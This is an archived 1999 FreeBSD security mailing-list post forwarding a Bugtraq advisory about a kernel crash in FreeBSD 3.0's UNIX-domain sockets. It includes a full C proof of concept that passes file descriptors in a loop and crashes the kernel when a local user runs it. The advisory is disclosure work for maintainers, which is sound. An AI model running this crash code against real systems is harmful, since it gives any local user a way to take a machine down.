Date: Thu, 06 May 1999 12:16:37 -0700 From: Jamie Lawrence <jal@ThirdAge.com> To: security@freebsd.org Subject: Fwd: KKIS.05051999.003b Message-ID: <4.1.19990506121618.050a5aa0@mail.thirdage.com>
next in thread | raw e-mail | index | archive | help
--=====================_1188480344==_ Content-Type: text/plain; charset="us-ascii" >Approved-By: aleph1@UNDERGROUND.ORG >X-Sender: lluzar@nova.kki.krakow.pl >Date: Wed, 5 May 1999 11:26:21 +0200 >Reply-To: Lukasz Luzar <lluzar@SECURITY.KKI.PL> >Sender: Bugtraq List <BUGTRAQ@netspace.org> >From: Lukasz Luzar <lluzar@SECURITY.KKI.PL> >Subject: KKIS.05051999.003b >To: BUGTRAQ@netspace.org > >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > > ### ### ### ### ### > ### ### ### ### ### > ###### ###### ### > ### ### ### ### ### > ### ### ### ### ### > > S E C U R I T Y > >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Contacts ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > KKI Security Team Cracow Commercial Internet > http://www.security.kki.pl http://www.kki.pl > mailto:security@security.kki.pl mailto:biuro@kki.pl > >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Informations ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > Report title : Security problem with sockets in FreeBSD's > implementation of UNIX-domain protocol family. > Problem found by : Lukasz Luzar (lluzar@security.kki.pl) > Report created by : Robert Pajak (shadow@security.kki.pl) > Lukasz Luzar (lluzar@security.kki.pl) > Raport published : 5th May 1999 > Raport code : KKIS.05051999.003.b > Systems affected : FreeBSD-3.0 and maybe 3.1, > Archive : http://www.security.kki.pl/advisories/ > Risk level : high > >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Description ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > As you know, "The UNIX-domain protocol family is a collection of protocols > that provides local interprocess communication through the normal socket > mechanism. It supports the SOCK_STREAM and SOCK_DGRAM soceket types and uses > filesystem pathnames for addressing." > The SOCK_STREAM sockets also supports the communication of UNIX file > descriptors through the use of functions sendmsg() and recvmsg(). > While testing UNIX-domain protocols, we have found probable bug in > FreeBSD's implementation of this mechanism. > When we had run attached example on FreeBSD-3.0 as local user, system > had crashed imediatelly with error "Supervisor read, page not present" > in kernel mode. > >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Example ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > Look to attached example. > >~~~~~~~~~~~~~~~~~~~~~~~~~~[ Copyright statement ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > Copyright (c) 1999 KKI Security Team, Poland > All rights reserved. > > All questions please address to mailto:security@security.kki.pl >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > > --=====================_1188480344==_ Content-Type: text/plain; charset="us-ascii" Content-Disposition: attachment; filename="example1.c" #include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/un.h> #include <fcntl.h> #include <unistd.h> #define PATH "/tmp/123" #define PATH_TMP "/tmp/123.tmp" #define SOME_FILE "/etc/passwd" struct mycmsghdr { struct cmsghdr hdr; int fd; }; extern errno; void server(); void client(); void main() { switch ( fork()) { case -1: printf( "fork error %d\n",errno); break; case 0: for (;;) client(); default: server(); } } void server() { struct sockaddr_un addr; struct msghdr mymsghdr; struct mycmsghdr ancdbuf; char data[ 1]; int sockfd, len, fd; if ( unlink( PATH) == -1) printf( "unlink error %d\n",errno); if (( sockfd = socket( AF_UNIX,SOCK_DGRAM,0)) == -1) printf( "socket error %d\n",errno); strcpy( addr.sun_path,PATH); addr.sun_len = sizeof( addr.sun_len) + sizeof( addr.sun_family) + strlen( addr.sun_path); addr.sun_family = AF_UNIX; if ( bind( sockfd,(struct sockaddr *) &addr,addr.sun_len) == -1) printf( "bind error %d\n",errno); for (;;) { if (( fd = open( SOME_FILE,O_RDONLY)) == -1) printf( "open file error %d\n",errno); len = sizeof( addr.sun_path); if ( recvfrom( sockfd,&data,sizeof( data),0, (struct sockaddr *) &addr,&len) == -1) printf( "recvfrom error %d\n",errno); ancdbuf.hdr.cmsg_len = sizeof( ancdbuf); ancdbuf.hdr.cmsg_level = SOL_SOCKET; ancdbuf.hdr.cmsg_type = SCM_RIGHTS; ancdbuf.fd = fd; mymsghdr.msg_name = (caddr_t) &addr; mymsghdr.msg_namelen = len; mymsghdr.msg_iov = NULL; mymsghdr.msg_iovlen = 0; mymsghdr.msg_control = (caddr_t) &ancdbuf; mymsghdr.msg_controllen = ancdbuf.hdr.cmsg_len; mymsghdr.msg_flags = 0; if ( sendmsg( sockfd,&mymsghdr,0) == -1) printf( "sendmsg error %d\n",errno); close( fd); } } void client() { struct sockaddr_un addr_s, addr_c; struct mycmsghdr ancdbuf; struct msghdr mymsghdr; char data[ 1]; int sockfd, len, fd; if (( sockfd = socket( AF_UNIX,SOCK_DGRAM,0)) == -1) printf( "socket error %d\n",errno); if ( unlink( PATH_TMP) == -1) printf( "unlink error %d\n",errno); strcpy( addr_c.sun_path,PATH_TMP); addr_c.sun_len = sizeof( addr_c.sun_len) + sizeof(addr_c.sun_family) + strlen( addr_c.sun_path); addr_c.sun_family = AF_UNIX; strcpy( addr_s.sun_path,PATH); addr_s.sun_len = sizeof( addr_s.sun_len) + sizeof(addr_s.sun_family) + strlen( addr_s.sun_path); addr_s.sun_family = AF_UNIX; if ( bind( sockfd,(struct sockaddr*) &addr_c,addr_c.sun_len) == -1) printf( "bind error %d\n",errno); if ( sendto( sockfd,&data,sizeof( data),0,(struct sockaddr *) &addr_s, addr_s.sun_len) == -1) printf( "sendto error %d\n",errno); len = addr_s.sun_len; ancdbuf.hdr.cmsg_len = sizeof( ancdbuf); ancdbuf.hdr.cmsg_level = SOL_SOCKET; ancdbuf.hdr.cmsg_type = SCM_RIGHTS; mymsghdr.msg_name = NULL; mymsghdr.msg_namelen = 0; mymsghdr.msg_iov = NULL; mymsghdr.msg_iovlen = 0; mymsghdr.msg_control = (caddr_t) &ancdbuf; mymsghdr.msg_controllen = ancdbuf.hdr.cmsg_len; mymsghdr.msg_flags = 0; if ( recvmsg( sockfd,&mymsghdr,0) == -1) printf( "recvmsg error %d\n",errno); fd = ancdbuf.fd; close(fd); close( sockfd); } --=====================_1188480344==_-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?4.1.19990506121618.050a5aa0>